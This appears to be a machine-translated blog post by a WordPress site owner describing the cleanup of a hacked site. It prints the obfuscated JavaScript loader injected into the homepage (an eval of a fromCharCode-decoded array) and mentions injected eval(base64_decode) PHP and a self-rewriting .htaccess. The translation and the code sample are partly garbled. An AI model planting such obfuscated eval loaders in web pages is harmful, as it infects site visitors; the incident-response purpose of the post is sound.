After opening the website normally this morning, I found the homepage to the left. First, I should check the source code and find that the page was hung with the JS horse:
<Script> if(window.doc ument) a = ("v532b5 ". indexOf + Date ). substr (); aa = ([, 3] ['reverse'] + []. reverse ). substr (); if (aa = a) f = [-30,-, 63, ,-30,-30,, 75, 20,-30,-30, 86,-, 62,-,-30,-30,,, 0, 0,, 58,70, 62,23,-, 20,-30,-30,86,-30,-30,63, 78,71, 60,77, 66,72, 71,-7,66, 63,75, 58,70, 62,75, 84,-30,-30,-30, 79, 58,75,,,,,,, 20,-30,-30,,, 20,-30,-]; md = 'a'; e = window ['eval']; w = f; s = ''; g = 'F' + 'ro '+ 'mch' + 'ar' + 'cod '+ 'E'; for (I = 0; i-w.length <0; I ++) {j = I; s = s + String [g] (39 + w [j]);}
If (a = aa) e (s); </script>
So I immediately shut down the website and paused its operation first! Go to the server and package the program folder. After downloading it, you will find that the homepage is injected with: eval (base64_decode ('success ...... Omitted!
Download the database directly to check whether the data is injected. Fortunately, the data is safe. Next, what I need to do is file ratio!
What is depressing is that everything else is the same as the main program, but the difference is that wp-config and the index are all the same. Obviously, this MAF only writes the index, however, it is noted that the source code is added. htaccess, this file may not be too much concerned, but I have been working on linux for a long time, and this is the pseudo static file used in linux, this Rewrite technology is used in Apache (the address ing technology is called pulse technology ). This is obviously not a good thing for this kind of stuff. After downloading it, delete it, modify index. php, and wait, will it be written again?
One minute later, two minutes later ,...... Six minutes later, index. php was written again. TMD, angry, but not in a hurry. Check whether the search server still exists. htaccess, indeed, is hidden in other sites.
At this time, you need to analyze it ,. how is htaccess generated? on the local machine, we use commands such as cmd copy. on the server, the PHP program must use fopen and file_put_contents file names to retrieve them directly. now we can find out if the running websites have these content numbers. After searching through WEBlog and windows, I finally knocked out all the Trojans!
What we need to do next for the program is security, read/write, and base64_decode. I personally suggest closing this function. For security, the latest version of wp may not be the safest, the latest version is only a test version. If you are familiar with functions and classes in the old version, you do not have to update the first version as soon as there is an update. I have a site that uses version 2.8, which is safe, security and insecurity are closely related to people, and even higher security may be overwhelmed by the past morning.
Author Yang Xiaowei's study and work notes
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
